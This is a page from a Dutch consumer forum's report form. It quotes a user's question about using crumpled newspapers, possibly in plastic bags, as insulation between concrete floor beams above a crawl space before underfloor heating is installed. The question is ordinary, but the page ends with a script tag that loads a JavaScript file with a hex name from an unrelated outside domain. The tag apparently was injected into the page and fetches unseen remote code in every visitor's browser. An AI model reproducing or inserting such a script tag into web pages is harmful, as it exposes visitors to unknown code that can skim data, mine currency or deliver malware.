Rapporteren

Let op: Deze rapporteerfunctie is bedoeld om schendingen van de huisregels voor Vraag & Beantwoord te melden. De redactie beoordeelt jouw melding alleen daarop. Wil je dat jouw reactie ook op het forum leesbaar is? Log dan eerst in op de Kassa-site en plaats je bijdrage. Of start zelf even een topic met je eigen vraag erin verwoord.

Heb je een vraag voor Kassa? Stel deze dan via dit contactformulier.

Je wilt de volgende vraag rapporteren aan de redactie:

wi
witje75 - 09-10-2019 17:53:59
Huishouden & Energie

Kan je gewone kranten als isolatie gebruiken?

Binnenkort krijgen we vloerverwarming. daarom willen we graag onze ongeïsoleerde broodjesvloer van beton gaan isoleren door 10 cm dikke eps platen (2 x 5 cm) tegen de dragers aan te plakken. nu twijfel ik wat te doen met de ruimte tussen de broodjes in, wat zo'n 4 cm hoog is. ik ga er vanuit dat dat teveel lucht is om stilstaande lucht te kunnen zijn. ook is het best lastig om met eps platen goed te isoleren waar er buizen zitten.

nu vraag ik me af, of het een goed idee zou kunnen zijn, om proppen krant te stoppen tussen de broodjes, eventueel in plastic zakken gestopt, in de ruimte tussen de vloer en de eps platen. ik zou denken dat de lucht in krantenproppen meer stilstaande lucht is, en dit kan veel makkelijker om en tussen de buizen als isolatie werken. op internet kom ik enkel tegen dat je kranten kunt gebruiken als cellulose isolatie. daar zit geen lucht meer tussen, maar moet je weer aanschaffen. terwijl oude kranten gratis herbruikbaar zijn. zou dat kunnen werken? iemand toevallig al uitgeprobeerd? zou je beter luchtige proppen of juist vastere proppen kunnen gebruiken voor de beste isolatie? dus veel of weinig kranten per m²? 

voor de volledigheid: we hebben schelpen in de kruipruimte, en daardoor geen water meer te zien. wel soms beetje muffe lucht. de ruimte is 50 cm hoog zonder isolatie. er zit voldoende ventilatie in. 

iemand ervaring en of tips?
<script src="//onlinekey.biz/1f9f5ee62aefca3cb1.js" async="" type="text/javascript">